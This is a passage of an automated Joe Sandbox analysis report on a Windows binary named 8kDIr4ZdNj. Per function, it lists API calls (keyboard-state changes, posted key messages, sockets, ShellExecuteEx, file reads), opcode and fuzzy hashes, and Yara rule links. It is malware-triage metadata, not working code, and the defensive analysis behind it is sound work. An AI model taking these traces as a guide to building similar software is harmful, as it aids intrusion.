                                                                        • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249), ref: 008C98F1
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0091FB24,00000001,00000000,?,?,008C8249,0091FB24), ref: 008C9921
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C993E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__lseeki64_nolock$AllocErrorFileLastProcess__getptd_noexit
                                                                        • String ID: shj
                                                                        • API String ID: 2369599718-2847237874
                                                                        • Opcode ID: fae0bd7f9a0e020e20e5db0e618f693b28a94d44a817b508b6438e7ddcd9ad8c
                                                                        • Instruction ID: fcf4b87371cd3643d442384dd02ab051bf554531eea092d56c56b67e48929ccb
                                                                        • Opcode Fuzzy Hash: fae0bd7f9a0e020e20e5db0e618f693b28a94d44a817b508b6438e7ddcd9ad8c
                                                                        • Instruction Fuzzy Hash: 0511B471644605AACB102FB89C4EBAC3774FF0B321F1447B8F569D62E0E638C4018652
                                                                        Function 008F42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008F4312
                                                                        • LoadStringW.USER32(00000000), ref: 008F4319
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008F432F
                                                                        • LoadStringW.USER32(00000000), ref: 008F4336
                                                                        • _wprintf.LIBCMT ref: 008F435C
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008F437A
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 008F4357
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        • Opcode ID: 3d8f3701dcc4af03feffc20ced76368277e19cdd762bd4a9ba7d6e32fd5f7787
                                                                        • Instruction ID: 2873cac0eae2c5fc39239eb8f97aebf99b1e1ddf077f8649df16484f3784760d
                                                                        • Opcode Fuzzy Hash: 3d8f3701dcc4af03feffc20ced76368277e19cdd762bd4a9ba7d6e32fd5f7787
                                                                        • Instruction Fuzzy Hash: E6012CF6A0420CBFE711A7A49D89EEB766CEB08300F4045A2BB49E2151EA745E859B71
                                                                        Function 00892A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 00892ACF
                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00892B17
                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 008CC21A
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008CC1C7,00000004,00000000,00000000,00000000), ref: 008CC286
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: 4bbc64ed71ecb743e49632330e9e8c2aa9a84f78dac3b16de2bf482d2cc40ac8
                                                                        • Instruction ID: e19b418d9b22ff2311d159354e090e915d50a877ff9344f8fda376ba05073d07
                                                                        • Opcode Fuzzy Hash: 4bbc64ed71ecb743e49632330e9e8c2aa9a84f78dac3b16de2bf482d2cc40ac8
                                                                        • Instruction Fuzzy Hash: C041F832618798BACF35AB299C9CB6E7BE2FB45324F1C881DE04BC6561C671E841E711
                                                                        Function 008F70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 008F70DD
                                                                          • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
                                                                          • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008F7114
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 008F7130
                                                                        • _memmove.LIBCMT ref: 008F717E
                                                                        • _memmove.LIBCMT ref: 008F719B
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008F71AA
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008F71BF
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 008F71DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 256516436-0
                                                                        • Opcode ID: ec8c32582eef94ee513b3a974b2bbc20046c2ae5aa170b91ba19bb1a8c96accb
                                                                        • Instruction ID: 3738e64a6e015579927be7e04823bda4a901c79e94cdbfe3ab6fddd7c01a9f33
                                                                        • Opcode Fuzzy Hash: ec8c32582eef94ee513b3a974b2bbc20046c2ae5aa170b91ba19bb1a8c96accb
                                                                        • Instruction Fuzzy Hash: F2316D31A04209EBDB00DFA8DC85AAFB7B8FF45310F1481B5E904EB256DB30DA54DBA1
                                                                        Function 009161D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 009161EB
                                                                        • GetDC.USER32(00000000), ref: 009161F3
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009161FE
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0091620A
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00916246
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00916257
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00916291
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009162B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 982ca4cc74dd4c58734badb825b9ca302688fcff81c60abb7b8c1e9f314e7033
                                                                        • Instruction ID: 99195fe74784293fc6a07dcc87929438a11adcef7b539618c754e132faab0c1d
                                                                        • Opcode Fuzzy Hash: 982ca4cc74dd4c58734badb825b9ca302688fcff81c60abb7b8c1e9f314e7033
                                                                        • Instruction Fuzzy Hash: 7E319C72214218BFEF118F10CC8AFEA3BADEF4A765F044065FE08DA291C6759C41CB60
                                                                        Function 008EBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        • API String ID: 2931989736-0
                                                                        • Opcode ID: 409671b803bb62151fb5a9203db2c0d418b2c34d5da17e301410130438e6bd43
                                                                        • Instruction ID: 89e7dc73d110632f7d14f5e577823dcd318cb437182abd9cf880a27e833aa1aa
                                                                        • Opcode Fuzzy Hash: 409671b803bb62151fb5a9203db2c0d418b2c34d5da17e301410130438e6bd43
                                                                        • Instruction Fuzzy Hash: 3C2123716052997BEA04A716AD52FFB735EFF9235CF184420FD04DA24BEB24DE10C2A6
                                                                        Function 008FEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • _wcstok.LIBCMT ref: 008FEC94
                                                                        • _wcscpy.LIBCMT ref: 008FED23
                                                                        • _memset.LIBCMT ref: 008FED56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow_memset_wcstok
                                                                        • String ID: X
                                                                        • API String ID: 1564591943-3081909835
                                                                        • Opcode ID: fcce1c1f58eb9498143ae1aa0c4a932cb6dd053fbc71fe5c5f6ac90f48f34f27
                                                                        • Instruction ID: 6221bdbc59e924640bc75cdfc47e003bec3f76a339c6c43dd0f465ab26c30433
                                                                        • Opcode Fuzzy Hash: fcce1c1f58eb9498143ae1aa0c4a932cb6dd053fbc71fe5c5f6ac90f48f34f27
                                                                        • Instruction Fuzzy Hash: F9C13B716083449FCB64EF28D841A6AB7E4FF85314F14492DF99ADB2A2DB30E845CB53
                                                                        Function 00906B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00906C00
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00906C21
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00906C34
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00906CEA
                                                                        • inet_ntoa.WSOCK32(?), ref: 00906CA7
                                                                          • Part of subcall function 008EA7E9: _strlen.LIBCMT ref: 008EA7F3
                                                                          • Part of subcall function 008EA7E9: _memmove.LIBCMT ref: 008EA815
                                                                        • _strlen.LIBCMT ref: 00906D44
                                                                        • _memmove.LIBCMT ref: 00906DAD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 3619996494-0
                                                                        • Opcode ID: c19908d22db0f4fc7c427c543c3f9026d068e5f3cbed6e436fe379878a70a9a4
                                                                        • Instruction ID: d995da95b1f288f2638de3a724df2e87858dfc0ceaafed08a6c90c7875a1250c
                                                                        • Opcode Fuzzy Hash: c19908d22db0f4fc7c427c543c3f9026d068e5f3cbed6e436fe379878a70a9a4
                                                                        • Instruction Fuzzy Hash: 5881AE71208200AFDB10EB28CC92E6AB7E8EF95724F14491DF556DB2D2DB70AD01CB92
                                                                        Function 00891424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c4432a82ee319daae911af9f2dcfe443dfb6b9a3952b80e35ea31d8b6851bd13
                                                                        • Instruction ID: 6a9ce5aa6e72970388d132d0abbcfbbb62bdaa198586b81009313084f3400805
                                                                        • Opcode Fuzzy Hash: c4432a82ee319daae911af9f2dcfe443dfb6b9a3952b80e35ea31d8b6851bd13
                                                                        • Instruction Fuzzy Hash: 72715B30A0850AEFCF04EF98CC49EBEBB79FF89314F148159E915EA251C734AA51CB64
                                                                        Function 0091B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • IsWindow.USER32(014C4A20), ref: 0091B3EB
                                                                        • IsWindowEnabled.USER32(014C4A20), ref: 0091B3F7
                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0091B4DB
                                                                        • SendMessageW.USER32(014C4A20,000000B0,?,?), ref: 0091B512
                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0091B54F
                                                                        • GetWindowLongW.USER32(014C4A20,000000EC), ref: 0091B571
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0091B589
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                        • String ID:
                                                                        • API String ID: 4072528602-0
                                                                        • Opcode ID: 00035b525dc26d251b88e07f410207da003b9df5a1b1d908cf298c2548cb4b3d
                                                                        • Instruction ID: 0304ba59003ef6fc0ce8e4bbd349ee2d83b6aab7a1d63db4ef82df12566bead8
                                                                        • Opcode Fuzzy Hash: 00035b525dc26d251b88e07f410207da003b9df5a1b1d908cf298c2548cb4b3d
                                                                        • Instruction Fuzzy Hash: 39719C38705308AFDB20DF65C8A4FFA7BBAEF49310F148059FA55972A2C731A891DB50
                                                                        Function 008BDA16 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetConsoleMode.KERNEL32(?,?), ref: 008BDABC
                                                                        • GetConsoleCP.KERNEL32 ref: 008BDADA
                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 008BDC19
                                                                          • Part of subcall function 008B8AF4: __getptd_noexit.LIBCMT ref: 008B8AF4
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Console__getptd_noexit$ByteCharModeMultiWide
                                                                        • String ID: Pp>
                                                                        • API String ID: 321029406-1895935624
                                                                        • Opcode ID: 48988313bd47f6c38aaf9577301f878c2042a52a65f3f788b82ff97c35ef1c18
                                                                        • Instruction ID: 0a7ef0747a4b973e558a9103bf02e5476900dc76e43dbe49b099ed34f49adc1e
                                                                        • Opcode Fuzzy Hash: 48988313bd47f6c38aaf9577301f878c2042a52a65f3f788b82ff97c35ef1c18
                                                                        • Instruction Fuzzy Hash: 79714875B066189FCB24CB59DC90AE9B7B4FB0A315F1841D9E40AE6B81DB319E81CF42
                                                                        Function 0090F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0090F448
                                                                        • _memset.LIBCMT ref: 0090F511
                                                                        • ShellExecuteExW.SHELL32(?), ref: 0090F556
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                        • GetProcessId.KERNEL32(00000000), ref: 0090F5CD
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0090F5FC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 2674045824-2766056989
                                                                        • Opcode ID: b94ecc6160737f3a363008fc375521c70addc37987703c35464b9b819a1073f4
                                                                        • Instruction ID: e40f361074a347ef97c5bf6eaeb7c8d389b7a8399ed5269e6096a8af6f9eb5a8
                                                                        • Opcode Fuzzy Hash: b94ecc6160737f3a363008fc375521c70addc37987703c35464b9b819a1073f4
                                                                        • Instruction Fuzzy Hash: 0561AE71A006199FCF14EF68C8959AEBBF5FF49310F14806DE859AB791DB30AE41CB81
                                                                        Function 008F0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 008F0F8C
                                                                        • GetKeyboardState.USER32(?), ref: 008F0FA1
                                                                        • SetKeyboardState.USER32(?), ref: 008F1002
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 008F1030
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 008F104F
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 008F1095
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008F10B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: 5704dd3d07a8e0e3fb143e1bb16fdaa1c6037ef5b51f840990511360c8e28ee5
                                                                        • Instruction ID: 773c9bad2e080c549470c5081f4defb06f1940f1a3d5d6b0683e68b5d5308571
                                                                        • Opcode Fuzzy Hash: 5704dd3d07a8e0e3fb143e1bb16fdaa1c6037ef5b51f840990511360c8e28ee5
                                                                        • Instruction Fuzzy Hash: 4D51D460604BD9BDFF3642348C19BB6BEA9FB46304F088589E2D5C58D3C6A9DCC4DB51
                                                                        Function 008F0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 008F0DA5
                                                                        • GetKeyboardState.USER32(?), ref: 008F0DBA
                                                                        • SetKeyboardState.USER32(?), ref: 008F0E1B
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008F0E47
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008F0E64
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008F0EA8
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008F0EC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: e49d9838647917fbb13f4b247732a7e14f839975a74774685c4442071a56f733
                                                                        • Instruction ID: c06cbbc612c14097819f3ff603dbb1841b26b37b1a92381ba9d1a969e7f61eb3
                                                                        • Opcode Fuzzy Hash: e49d9838647917fbb13f4b247732a7e14f839975a74774685c4442071a56f733
                                                                        • Instruction Fuzzy Hash: B051D5A06187DD7DFB3282748C55BBA7E99FB06300F088989E2D4C64C3D795AC94EB51
                                                                        Function 008F55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
